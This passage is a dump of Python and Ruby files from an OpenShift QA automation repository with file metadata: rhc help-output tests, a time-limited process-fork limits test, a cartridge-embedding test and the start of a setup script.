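A hypothetical override (the helper\nname is assumed, not part of this module) might acquire shared resources:\n\n    def initialize(self, *args):\n        self.session = open_session()\n\nThe base implementation is a no-op. 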
\"\"\" \n pass\n\n def finalize(self, *args):\n \"\"\"Override this if you need to do some clean-up after the suite is run.\"\"\"\n try:\n if self.config.tcms_testcaserun_id is not None:\n sys.stdout.flush()\n sys.stderr.flush()\n time.sleep(2) #we need a time to flush the buffers for tee from launcher.py?\n f = open(\"%s/curr_tc_log.%s\"%(get_tmp_dir(), self.config.tcms_testcaserun_id), 'r')\n log = f.read()\n self.info(\"<html>%s</html>\" % log)\n f.close()\n else:\n self.info('Run manually - not by launcher.py => the stderr/stdout will not be included into the report.')\n except:\n pass\n\n#######################\n# helper functions\n#######################\n\ndef underscore_to_camelcase(word):\n return ''.join(x.capitalize() or '_' for x in word.split('_'))\n \ndef convert_script_to_cls(name):\n \"\"\"\n convert a test script name as stored in TCMS and convert it into a class\n that can be added by add_test()\n XXX: due to inconsistent naming conventions between filename \n for example: quick_start_redmine.py vs the class name defined in the \n testscript itself QuickStartRedmine\n we need to either have a naming convention in place and fix the exisiting\n scripts. This function will help to guess the class name to import\n \"\"\"\n mod = __import__(name)\n components = name.split('.')\n for comp in components[1:]:\n mod_list = dir(mod)\n cls_name = underscore_to_camelcase(comp)\n mod = getattr(mod, comp)\n \n cls_list = dir (mod)\n try:\n klass = getattr(mod, cls_name)\n except:\n # crude hack.\n klass = getattr(mod, cls_list[0])\n return klass\n\n#######################\n# helper functions\n#######################\n\ndef extract_tests_from_json_file(json_file):\n \"\"\"\n \n \"\"\"\n import json\n tests = []\n json_text = open(json_file, 'r')\n json_data = json.load(json_text)\n for data in json_data:\n converted_name = data['script'].replace(\"/\", '.').split('.py')[0]\n args = data['arguments']\n tests.append((converted_name, args))\n \"\"\"\n if data['arguments']:\n testcase_variants = eval(data['arguments']).__getitem__('variants')\n testcase_arg_dict[data['case_id']] = testcase_variants\n \"\"\"\n return (tests)\n\n\n# A test module may use \"from qatest import *\" and get these default\n# initialize/finalize functions. 
These are run as module-level initialize and\n# finalize by the testrunner module.\n\ndef initialize(conf):\n pass\n\ndef finalize(conf):\n pass\n\nif __name__ == \"__main__\":\n #os.system(\"qaunittest test_stratatest\")\n #val = underscore_to_camelcase('sending_email')\n val = convert_script_to_cls('Collections.Demo.demo_03')\n print val\n\n" }, { "alpha_fraction": 0.5347558856010437, "alphanum_fraction": 0.5360491275787354, "avg_line_length": 28.740385055541992, "blob_id": "ab2f1ef638781e047badd40c66d2ea31b5bd4a2f", "content_id": "c5a1398173ccdbe5deaa75bd1f005040468a6ad1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6186, "license_type": "no_license", "max_line_length": 99, "num_lines": 208, "path": "/automation/open/testmodules/RT/client/man_pages.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nAug 2, 2012\n\"\"\"\n\nimport rhtest\nimport common\nimport re\n\n\nclass ManPageTest(rhtest.Test):\n\n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.testcase_summary = '[rhc-client]man page and help check for all client commands'\n\n def finalize(self):\n pass\n\n def log_message(self, pattern, status):\n self.info(\"Pattern '%s'... %s\" % ( pattern, status ))\n\n def get_output(self):\n ( ret_code, ret_output ) = common.command_getstatusoutput(\"man %s | col -b\" % self.command)\n if ret_code == 0:\n return ret_output\n else:\n return None\n\n def test_method(self):\n # Gettng the man page\n output = self.get_output()\n\n # Checking patterns in the output\n missing_patterns = [ ]\n for pattern in self.pattern_list:\n result = \"OK\"\n match = re.search(pattern, output)\n if not match:\n result = \"FAIL\"\n missing_patterns.append(pattern)\n self.log_message(pattern, result)\n\n # Assertion\n self.info('Asserting that the number of missing patterns is 0')\n self.assert_equal(len(missing_patterns), 0)\n\n # Everythng is OK\n return self.passed(\" - \".join([ self.testcase_summary, self.command ]))\n \n\n#class RhcTest(ManPageTest):\n#\n# def initialize(self):\n# self.command = 'rhc'\n# self.pattern_list = [\n# 'alias', 'cartridge', 'domain', 'app', 'sshkey', \n# 'port-forward', 'setup', 'server', 'snapshot', 'tail', 'threaddump'\n# ]\n\nclass RhcHelpTest(ManPageTest):\n\n def initialize(self):\n self.command = 'rhc'\n self.pattern_list = [\n 'alias', 'cartridge', 'domain', 'app', 'sshkey', \n 'port-forward', 'setup', 'server', 'snapshot', 'tail', 'threaddump'\n ]\n\n\n def get_output(self):\n ( ret_code, ret_output ) = common.command_getstatusoutput('rhc help')\n return ret_output\n\n\n#class RhcDomainTest(ManPageTest):\n#\n# def initialize(self):\n# self.command = 'rhc-domain'\n# self.pattern_list = [\n# 'create', 'update', 'show', 'status', 'delete',\n# '-l', '--rhlogin', '-p', '--password', '-d', '--debug', '-h', '--help',\n# '--config', '--timeout', '--noprompt', '-v', '--version'\n# ]\n\nclass RhcDomainHelpTest(ManPageTest):\n\n def initialize(self):\n self.command = 'rhc domain'\n self.pattern_list = [\n 'create', 'update', 'show', 'status', 'delete',\n '-l', '--rhlogin', '-p', '--password', '-d', '--debug', '-h', '--help',\n '--config', '--timeout', '--noprompt', '-v', '--version'\n ]\n \n def get_output(self):\n ( ret_code, ret_output ) = common.command_getstatusoutput('rhc help domain')\n return ret_output\n\n#class RhcAppTest(ManPageTest):\n#\n# def initialize(self):\n# self.command = 'rhc-app'\n# 
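\n# (The commented-out Rhc*Test variants in this file checked the man pages via\n# the base get_output(); the active *HelpTest classes exercise \"rhc help\n# <command>\" output instead.)\n#        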
self.pattern_list = [\n# 'reload', 'tidy', 'git-clone', 'delete', \n# 'create', 'start', 'stop', 'restart',\n# 'force-stop', 'status', 'show', '-l', '--rhlogin',\n# '-p', '--password', '-d', '--debug',\n# '--noprompt', '--config', '-h', '--help',\n# '-v', '--version', '--timeout'\n# ]\n\nclass RhcAppHelpTest(ManPageTest):\n\n def initialize(self):\n self.command = 'rhc app'\n self.pattern_list = [\n 'reload', 'tidy', 'git-clone', 'delete', \n 'create', 'start', 'stop', 'restart',\n 'force-stop', 'status', 'show', '-l', '--rhlogin',\n '-p', '--password', '-d', '--debug',\n '--noprompt', '--config', '-h', '--help',\n '-v', '--version', '--timeout'\n ]\n\n def get_output(self):\n ( ret_code, ret_output ) = common.command_getstatusoutput('rhc help app')\n return ret_output\n\n\n#class RhcSshkeyTest(ManPageTest):\n#\n# def initialize(self):\n# self.command = 'rhc-sshkey'\n# self.pattern_list = [\n# 'list', 'add', 'show', 'remove', '-l', '-p', '-d', '-h','-v',\n# '--config', '--timeout', '--noprompt'\n# ]\n\nclass RhcSshkeyHelpTest(ManPageTest):\n\n def initialize(self):\n self.command = 'rhc sshkey'\n self.pattern_list = [\n 'list', 'add', 'show', 'remove', '-l', '-p', '-d', '-h','-v',\n '--config', '--timeout', '--noprompt'\n ]\n \n def get_output(self):\n ( ret_code, ret_output ) = common.command_getstatusoutput('rhc help sshkey')\n return ret_output\n\n\n#class RhcPortForwardTest(ManPageTest):\n#\n# def initialize(self):\n# self.command = 'rhc port-forward'\n# self.pattern_list = [\n# '-l', '--rhlogin', '-p', '--password', '-a', '--app', '-d', \n# '-h', '--help', '--config', '--timeout'\n# ]\n\n\nclass RhcPortForwardHelpTest(ManPageTest):\n def initialize(self):\n self.command = 'rhc port-forward'\n self.pattern_list = [\n '-l', '--rhlogin', '-p', '--password', '-a', '--app', '-d', \n '-h', '--help', '--config', '--timeout'\n ]\n \n def get_output(self):\n ( ret_code, ret_output ) = common.command_getstatusoutput('rhc help port-forward')\n return ret_output\n\n\n#class ExpressConfTest(ManPageTest):\n#\n# def initialize(self):\n# self.command = 'express.conf'\n# self.pattern_list = [\n# 'Search order', 'libra_server', 'ssh_key_file', 'debug', 'timeout', 'default_rhlogin'\n# ]\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n #suite.add_test(RhcTest)\n suite.add_test(RhcHelpTest)\n #suite.add_test(RhcDomainTest)\n suite.add_test(RhcDomainHelpTest)\n #suite.add_test(RhcAppTest)\n suite.add_test(RhcAppHelpTest)\n #suite.add_test(RhcSshkeyTest)\n suite.add_test(RhcSshkeyHelpTest)\n #suite.add_test(RhcPortForwardTest)\n suite.add_test(RhcPortForwardHelpTest)\n #suite.add_test(ExpressConfTest)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5136112570762634, "alphanum_fraction": 0.5166769027709961, "avg_line_length": 27.765432357788086, "blob_id": "34b7c2740005f4934f63582d5d11303e4761fcaa", "content_id": "4417fa6294721e92f8718fd9ba15ed6f4fe86d87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16310, "license_type": "no_license", "max_line_length": 126, "num_lines": 567, "path": "/automation/open/testmodules/RT/limits/app_template/multifork.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\"\"\"\nThis is a template Python script. It contains boiler-plate code to define and\nhandle values needed to run the script. \n\nDefault values are defined in the dictionary \"defaults\". 
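Each default can be\noverridden from the environment via an upper-cased key with a MULTIFORK_ prefix;\nfor example (hypothetical value), MULTIFORK_COUNT=8 raises the default child count.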
\nOptions are defined in the list \"test_options\"\n\n\n\"\"\"\n\n# ==============================================================================\n#\n# MODULES - Libraries needed to perform the task\n#\n# ==============================================================================\n\n\n\n# Prepare default output mechanism\nimport logging\n\n# Access to getenv for default overrides\nimport os\n\n# Allow exit control\nimport sys\n\n# for sleep and debug reports\nimport time\n\n# Objects for CLI argument processing\nfrom optparse import OptionParser, Option\n\n# =======================\n# Add test specific modules here\n# =======================\n\n# send and recieve control signals\nfrom signal import signal, alarm, SIG_IGN, SIG_DFL, SIGINT, SIGALRM, SIGTERM\n\n# maxint on 64 bit is too big for sleep.\nmaxsleep = pow(2, 31) -1\n\n# =============================================================================\n#\n# OPTIONS - initializing the script execution parameters\n#\n# =============================================================================\n\n#\n# Values to use if no explicit input is given\n#\ndefaults = {\n 'debug': False,\n 'verbose': False,\n 'duration': 5,\n 'count': 1,\n 'sleep': maxsleep, # maxint on 64 bit is too big for sleep\n 'daemon': False,\n 'logfile': None,\n 'pidfile': None,\n 'format': \"text\"\n}\n\n# Check for default overrides from the environment.\n# environment variable names are upper case versions of the default keys.\nfor key in defaults:\n value = os.getenv(\"MULTIFORK_\" + key.upper())\n if value is not None:\n defaults[key] = value\n\n# Options which all scripts must have.\n# Defaults may be inserted from the defaults dictionary defined above.\ndefault_options = (\n Option(\"-d\", \"--debug\", action=\"store_true\", default=defaults['debug'],\n help=\"enable debug logging\"),\n Option(\"-v\", \"--verbose\", action=\"store_true\", default=defaults['verbose'],\n help=\"enable verbose logging\"),\n Option(\"-n\", \"--dryrun\", dest=\"liverun\", action=\"store_false\", \n default=True,\n help=\"run logic only, no side effects\"),\n Option(\"-D\", \"--duration\", default=defaults['duration'], type=\"int\",\n help=\"run for the specified time in seconds\"),\n Option(\"-c\", \"--count\", default=defaults['count'], type=\"int\",\n help=\"run the number of processes requested\"),\n Option(\"-s\", \"--sleep\", default=defaults['sleep'], type=\"int\",\n help=\"sleep time for child processes\"),\n Option(None, \"--daemon\", default=defaults['daemon'], action=\"store_true\",\n help=\"run in the background\"),\n Option(\"-l\", \"--logfile\", default=defaults['logfile'],\n help=\"where to place log output\"),\n Option(\"-f\", \"--format\", default=defaults['format'], type=\"choice\",\n choices=['text', 'html', 'xml', 'json'],\n help=\"how to format logging output\"),\n Option(\"-p\", \"--pidfile\", default=defaults['pidfile'],\n help=\"location of a pid file if running in daemon mode\")\n)\n\n\n# CLI arguments specifically for this test. 
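A hypothetical entry would follow the\n# same Option(...) shape used for the defaults above, e.g.:\n#\n#   Option(\"-r\", \"--report\", default=None, help=\"write a run report here\")\n#\n# 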
Add them as needed\ntest_options = (\n\n)\n\nall_options = default_options + test_options\n\n\n#\n# A header for each log output format\n#\nheaderformat = {\n 'text':\n\"\"\"---- Multifork Report: PID %d----\n-------------------------------------------------------------------------------\n\"\"\",\n\n 'html':\n \"\"\"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/html4/strict.dtd\">\n<html>\n <head>\n <title>Multifork Report</title>\n <style type=\"text/css\">\n table { border-style : solid ; border-width : 2px ; }\n </style>\n </head>\n <body>\n <!-- PID = %d -->\n <h1>Multifork Report</h1>\n\"\"\",\n\n 'xml':\n \"\"\"<runreport title=\"multifork\" process=\"%d\">\n <logentries>\n\"\"\",\n\n 'json':\n \"\"\"{ \"title\": \"multifork\",\n \"process\": %d,\n \"logs\": [\n\"\"\"\n }\n\n# write the invocation/runtime parameters and run context information\nintroformat = {\n 'text': \n \"\"\"Daemon: %s\nDuration: %d seconds\nCount: %d children\nSleep: %d seconds\nLog File: %s\nPID File: %s\n--------------------------------------------------------------------------------\n\"\"\",\n\n 'html':\n \"\"\"<table class=\"summary\">\n <caption>Invocation</caption>\n <tr><th>Name</th><th>Value</th></tr>\n <tr><td>Daemon</td><td>%s</td></tr>\n <tr><td>Duration (sec)</td><td>%d</td></tr>\n <tr><td>Count (procs)</td><td>%d</td></tr>\n <tr><td>Sleep (sec)</td><td>%d</td></tr>\n <tr><td>Log File</td><td>%s</td></tr>\n <tr><td>PID FIle</td><td>%s</td></tr>\n</table>\n<table class=\"logs\">\n <caption>Event Log</caption>\n <tr>\n <th>PID</th>\n <th>Name</th>\n <th>Log Level</th>\n <th>Date/Time</th>\n <th>Message</th>\n </tr>\n\"\"\",\n\n 'xml':\n \"\"\"<invocation daemon=\"%s\" duration=\"%d\" count=\"%d\" sleep=\"%d\" logfile=\"%s\" pidfile=\"%s\">\n</invocation>\n\"\"\",\n\n 'json':\n \"\"\"\n[ \"invocation\" ]\n\"\"\" \n }\n\n#\n# A log entry format for each output method\n#\nlogformat = {\n 'text': \"\"\"%(levelname)s:%(name)s:%(process)s: %(message)s\"\"\",\n\n 'html': \n\"\"\"<tr class=\"logentry\">\n <td class=\"process\">%(process)s</td>\n <td class=\"logname\">%(name)s</td>\n <td class=\"loglevel\">%(levelname)s</td>\n <td class=\"datetime\">%(asctime)s</td>\n <td class=\"message\">%(message)s</td>\n</tr>\"\"\",\n\n 'xml': \n\n\"\"\"<logentry pid='%(process)s' name='%(name)s' level='%(levelname)s' time='%(asctime)s' >\n%(message)s\n</logentry>\"\"\",\n\n 'json':\n\n\"\"\"{\n \"pid\": \"%(process)s\",\n \"level\": \"%(levelname)s\",\n \"name\": \"%(name)s\",\n \"time\": \"%(asctime)s\",\n \"message\": \"%(message)s\"\n},\"\"\"\n }\n\nsummaryformat = {\n 'text': \n \"\"\"--------------------------------------------------------------------------------\nsummary\n\"\"\",\n\n 'html':\n \"\"\" </table>\n<table class=\"summary\">\n <caption>Summary</caption>\n <tr><th>Name</th><th>Value</th></tr>\n <tr><td>Start Time</td><td>-</td></tr>\n <tr><td>End Time</td><td>-</td></tr>\n <tr><td>Duration</td><td>-</td></tr>\n</table>\n\n\"\"\",\n \n 'xml': \n \"\"\"<summary>\n</summary>\n\"\"\",\n\n 'json':\n\"\"\"summary = [ \n],\n\"\"\"\n\n }\n\n#\n# A footer format for each log output format\n#\nfooterformat = {\n 'text': \n \"\"\"--------------------------------------------------------------------------------\n\"\"\",\n \n 'html':\n \"\"\"\n </body>\n</html>\n\"\"\",\n \n 'xml':\n \"\"\" </logentries>\n</runreport>\n\"\"\",\n \n 'json':\n \"\"\" ]\n}\n\"\"\"\n \n }\n\n\n\n\n#\n# sample take from:\n# http://www.noah.org/wiki/Daemonize_Python\n#\ndef daemonize (stdin='/dev/null', 
stdout='/dev/null', stderr='/dev/null',\n pidfile=None):\n\n '''This forks the current process into a daemon. The stdin, stdout, and\n stderr arguments are file names that will be opened and be used to replace\n the standard file descriptors in sys.stdin, sys.stdout, and sys.stderr.\n These arguments are optional and default to /dev/null. Note that stderr is\n opened unbuffered, so if it shares a file with stdout then interleaved\n output may not appear in the order that you expect. '''\n\n # flush any pending output before forking\n sys.stdout.flush()\n sys.stderr.flush()\n\n # Do first fork.\n try: \n pid = os.fork() \n if pid > 0:\n sys.exit(0) # Exit first parent.\n except OSError, e: \n sys.stderr.write (\"fork #1 failed: (%d) %s\\n\" % (e.errno, e.strerror) )\n sys.exit(1)\n\n # Decouple from parent environment.\n os.chdir(\"/\") \n os.umask(0) \n os.setsid() \n\n\n # Do second fork.\n try: \n pid = os.fork() \n if pid > 0:\n sys.exit(0) # Exit second parent.\n except OSError, e: \n sys.stderr.write (\"fork #2 failed: (%d) %s\\n\" % (e.errno, e.strerror) )\n sys.exit(1)\n\n # Now I am a daemon!\n logger.debug(\"I am a daemon\")\n # if the caller asked for a pidfile, write it\n if pidfile:\n logger.debug(\"writing PID file %s\" % pidfile)\n pf = file(pidfile, \"w\")\n pf.write(\"%d\\n\" % os.getpid())\n pf.close()\n\n # Redirect standard file descriptors.\n if stdin:\n si = file(stdin, 'r')\n os.dup2(si.fileno(), sys.stdin.fileno())\n \n if stdout:\n so = file(stdout, 'a+')\n os.dup2(so.fileno(), sys.stdout.fileno())\n\n if stderr:\n se = file(stderr, 'a+', 0)\n os.dup2(se.fileno(), sys.stderr.fileno())\n\n\n# ===========================================================================\n#\n# Process functions\n#\n# ===========================================================================\nclass ProcessList(object):\n\n def __init__(self):\n self._complete = False\n self._processes = []\n self._duration = None\n self._count = None\n self._maxprocs = None\n self._child = False\n\n def activate(self, duration=10, count=0, sleep=maxsleep):\n\n logger = logging.getLogger(self.__class__.__name__ + \".activate\")\n\n self._duration = duration\n self._count = count\n self._sleep = sleep\n self._maxprocs = self._count\n\n signal(SIGALRM, self.finish)\n signal(SIGINT, self.abort)\n signal(SIGTERM, self.abort)\n\n alarm(self._duration)\n\n loop = 0\n while not self._child and not self._complete:\n # create processes until you reach max\n while len(self._processes) < self._maxprocs and not self._child:\n self.spawn()\n\n # max processes reached: wait for one to end\n if len(self._processes) > 0:\n logger.info(\"%d processes running\" % len(self._processes))\n try:\n (cpid, cstatus, rusage) = os.wait3(0)\n logger.debug(\"process %d completed with status %d\" % (cpid, cstatus))\n except OSError, e:\n if e.errno == 4:\n # alarm went off\n logger.debug(\"alarm woke me from wait\")\n else:\n raise\n \n # remove remaining processes\n self.shutdown()\n logger.info(\"run complete: procs requested: %d, max: %d\" % (self._count, self._maxprocs))\n\n def spawn(self):\n # create more\n logger = logging.getLogger(self.__class__.__name__ + \".spawn\")\n\n try:\n newpid = os.fork()\n except OSError, e:\n if e.errno == 11:\n # no more processes\n self._maxprocs = len(self._processes)\n logger.debug(\"Maximum processes reached: %d\" % self._maxprocs)\n return\n else:\n # no one expects something else\n raise\n\n if newpid == 0:\n self.child()\n return\n \n logger.debug(\"new child #%d, pid = %d\" % 
(len(self._processes), newpid))\n        self._processes.append(newpid)\n\n    def child(self):\n        # a child: just go to sleep and exit when done\n        # children should have no more child processes\n        logger = logging.getLogger(self.__class__.__name__ + \".child\")\n\n        self._child = True\n        signal(SIGALRM, SIG_IGN)\n        self._processes = []\n        self._complete = True\n        logger.debug(\"sleeping %d sec\" % self._sleep)\n        time.sleep(self._sleep)\n        logger.debug(\"exiting\")\n        sys.exit(0)\n\n    def abort(self, signum, frame):\n        if not self._child:\n            logger.info(\"received external interrupt\")\n            self.finish(signum, frame)\n\n    def finish(self, signum, frame):\n        \"\"\"Terminate all pending processes\"\"\"\n        logger = logging.getLogger(self.__class__.__name__ + \".finish\")\n        logger.debug(\"caught signal %d\" % signum)\n\n        # ignore the timer\n        signal(SIGALRM, SIG_IGN)\n\n        self._complete = True\n\n    def shutdown(self):\n        \"\"\"Kill and reap all of the processes in the list\"\"\"\n        # don't respond to children, we're going to wait for them explicitly\n        logger = logging.getLogger(self.__class__.__name__ + \".shutdown\")\n\n        while len(self._processes) > 0:\n            pid = self._processes[0]\n            logger.debug(\"%d processes remaining\" % len(self._processes))\n            logger.debug(\"terminating process %d\" % pid)\n\n            # terminate the process\n            try:\n                os.kill(pid, SIGTERM)\n            except OSError, e:\n                print \"Error killing process %d: %s\" % (pid, e.message)\n\n            # reap the process\n            try:\n                logger.debug(\"waiting for process %d\" % pid)\n                (cpid, cstatus, cresource) = os.wait3(0)\n                if pid != cpid:\n                    logger.warning(\"reaped process %d, expected %d\" % (cpid, pid))\n                # don't do anything with pid 0\n                if cpid != 0:\n                    # delete this child process from the active list\n                    logger.debug(\"removing pid %d from process list\" % cpid)\n                    i = self._processes.index(cpid)\n                    del self._processes[i]\n                else:\n                    logger.debug(\"process %d not waiting for reaping\" % pid)\n            except OSError, e:\n                print \"Error waiting for process %d: %s\" % (pid, e.message)\n\n# ============================================================================\n#\n# MAIN - Script Body\n#\n# ============================================================================\n\nif __name__ == \"__main__\":\n\n    # ======================================================================\n    # Environment and Command Line Processing\n    # ======================================================================\n\n    # Process command line arguments\n    (opt, args) = OptionParser(option_list=all_options).parse_args()\n\n    # Acquire the program logger early: daemonize() and the daemon branch\n    # below log through it, so it must exist before they run\n    logger = logging.getLogger(\"multifork\")\n\n    if opt.daemon:\n        logger.warning(\"daemonizing\")\n        daemonize(\"/dev/null\", opt.logfile, opt.logfile, pidfile=opt.pidfile)\n\n    if opt.logfile:\n        # create a file handler with the requested file\n        logging.basicConfig(\n            level=logging.INFO,\n            format=logformat[opt.format],\n            datefmt=\"%Y%m%d-%H:%M:%S-%Z\",\n            filename=opt.logfile\n        )\n        f = file(opt.logfile, 'a')\n        f.write(headerformat[opt.format] % os.getpid())\n        f.write(introformat[opt.format] % (opt.daemon, opt.duration, opt.count, opt.sleep, opt.logfile, opt.pidfile))\n        # be sure the output buffer is empty before forking or it prints twice\n        f.flush()\n        f.close()\n\n    else:\n        logging.basicConfig(level=logging.INFO,\n            format=logformat[opt.format],\n            datefmt=\"%Y%m%d-%H:%M:%S-%Z\",\n            stream=sys.stdout\n        )\n        sys.stdout.write(headerformat[opt.format] % os.getpid())\n        sys.stdout.write(introformat[opt.format] % (opt.daemon, opt.duration, opt.count, opt.sleep, opt.logfile, opt.pidfile))\n        sys.stdout.flush()\n        # be sure the output buffer is empty before forking or 
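it prints twice\n        # (sanity check, hypothetical invocation: \"python multifork.py -c 2 -D 3\"\n        #  should emit the banner exactly once; without the flush above, 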
it prints twice\n\n # Define the main program logger\n logger = logging.getLogger(\"multifork\")\n\n if opt.verbose:\n logging.root.setLevel(logging.INFO)\n logger.setLevel(logging.INFO)\n logger.info(\" enabled verbose logging\")\n\n # Enable debug output if the user has requested it\n if opt.debug:\n logging.root.setLevel(logging.DEBUG)\n logger.setLevel(logging.DEBUG)\n logger.debug(\" enabled debug logging\")\n\n # =======================================================================\n # Begin Task Logic\n # =======================================================================\n\n logger.debug(\"Forking %d times for %d seconds\" %\n (opt.count, opt.duration)\n )\n\n plist = ProcessList()\n\n plist.activate(opt.duration, opt.count)\n\n if opt.logfile:\n f = file(opt.logfile, \"a\")\n f.write(summaryformat[opt.format])\n f.write(footerformat[opt.format])\n f.close()\n else:\n sys.stdout.write(summaryformat[opt.format])\n sys.stdout.write(footerformat[opt.format])\n\n if opt.daemon and opt.pidfile:\n os.unlink(opt.pidfile)\n" }, { "alpha_fraction": 0.5237573385238647, "alphanum_fraction": 0.5310672521591187, "avg_line_length": 40.76335906982422, "blob_id": "7248760368425c1f414ed6c886dad77dd9466fc0", "content_id": "246c56ef848d62fdb18c0909e71fd4bdb820870b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5472, "license_type": "no_license", "max_line_length": 119, "num_lines": 131, "path": "/automation/open/testmodules/RT/cartridge/postgresql_and_mysql_in_the_same_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nAttila Nagy\[email protected]\nFeb 9, 2012\n\n[US1386][Runtime][rhc-cartridge]Shouldn't be able to embed PostgreSQL and MySQL in the same app\nhttps://tcms.engineering.redhat.com/case/129309/\n\"\"\"\n\nimport os\nimport sys\n\nimport testcase\nimport common\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary =\"[US1386][Runtime][rhc-cartridge]Shouldn't be able to embed PostgreSQL and MySQL in the same app\"\n self.testcase_id = 129309\n try:\n test_name = self.config.test_variant\n except:\n self.info(\"Missing OPENSHIFT_test_name, used `php` as default.\")\n test_name = 'php'\n self.app_type = common.app_types[test_name]\n self.app_name = 'myTestingApp'\n self.steps= []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass PostgresqlAndMysqlInTheSameApp(OpenShiftTest):\n def test_method(self):\n self.steps.append(testcase.TestCaseStep(\n 'Creating an application',\n common.create_app,\n function_parameters = [ self.app_name, self.app_type, \n self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, False ],\n expect_description = 'The app should be created successfully',\n expect_return = 0))\n\n self.steps.append(testcase.TestCaseStep(\n 'Embedding MySQL to the application',\n common.embed,\n function_parameters = [ self.app_name, \n 'add-%s' % ( common.cartridge_types['mysql'] ), \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd ],\n expect_description = 'MySQL cartridge should be embedded successfully',\n expect_return = 0))\n\n self.steps.append(testcase.TestCaseStep(\n 'Embedding PostgreSQL to the application',\n common.embed,\n function_parameters = [ self.app_name, \n 'add-%s' % ( common.cartridge_types['postgresql'] ), \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd ],\n expect_description = 'PostgreSQL 8.4 
cartridge should NOT be embedded successfully',\n expect_return = \"!0\"))\n\n self.steps.append(testcase.TestCaseStep(\n 'Removing MySQL cartrdige',\n common.embed,\n function_parameters = [ self.app_name,\n 'remove-%s' % ( common.cartridge_types['mysql'] ),\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd ],\n expect_description = 'MySQL cartrdige should be removed successfully',\n expect_return = 0))\n\n self.steps.append(testcase.TestCaseStep(\n 'Embedding PostgreSQL to the application',\n common.embed,\n function_parameters = [ self.app_name, \n 'add-%s' % ( common.cartridge_types['postgresql'] ), \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd ],\n expect_description = 'PostgreSQL 8.4 cartridge should be embedded successfully',\n expect_return = 0))\n\n self.steps.append(testcase.TestCaseStep(\n 'Embedding MySQL to the application',\n common.embed,\n function_parameters = [ self.app_name, \n 'add-%s' % ( common.cartridge_types['mysql'] ), \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd ],\n expect_description = 'MySQL 5.1 cartridge should NOT be embedded successfully',\n expect_return = \"!0\"))\n\n self.steps.append(testcase.TestCaseStep(\n 'Embedding Cron',\n common.embed,\n function_parameters = [ self.app_name,\n 'add-%s' % ( common.cartridge_types['cron'] ),\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd ],\n expect_description = 'Cron cartridge should be embed successfully',\n expect_return = 0))\n\n case = testcase.TestCase(self.summary, self.steps)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PostgresqlAndMysqlInTheSameApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.648622989654541, "alphanum_fraction": 0.666191816329956, "avg_line_length": 28.25, "blob_id": "f4a005443b89582a11fedc150f8f3552cb7266ad", "content_id": "eedd5a38933d5968a376b2ad0b9563116a4515d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 2106, "license_type": "no_license", "max_line_length": 535, "num_lines": 72, "path": "/automation/open/bin/setup.rb", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env ruby\n#\n# Username must be root\n#username = `whoami`\n#if username != 'root'\n# puts \"This script can only be executed by root\"\n# exit 255\n#end\n\nmodule Setup\n RHTEST_HOME = File.expand_path(File.dirname(__FILE__)) + File::SEPARATOR + \"..\" + File::SEPARATOR\n OS_HASH = { :fedora17 => /fedora.*17/i,\n :fedora16 => /fedora.*16/i,\n :rhel => /Red Hat Enterprise Linux/i,\n :ubuntu12 => /ubuntu.*12/i,}\n YUM_PACKAGES = \"git python-sqlobject expect firefox chromium postgresql postgresql-devel rubygem-rails perl-ExtUtils-MakeMaker perl-Module-Build maven3 gcc gcc-c++ rubygem-sqlite3 rubygem-rack-mount sqlite-devel rubygem-pg mongodb krb5-workstation httpd-tools python-pip python-paramiko python-kerberos python-selenium java-1.7.0-openjdk ruby-devel python-devel perl-devel mysql-devel spawn patch readline 
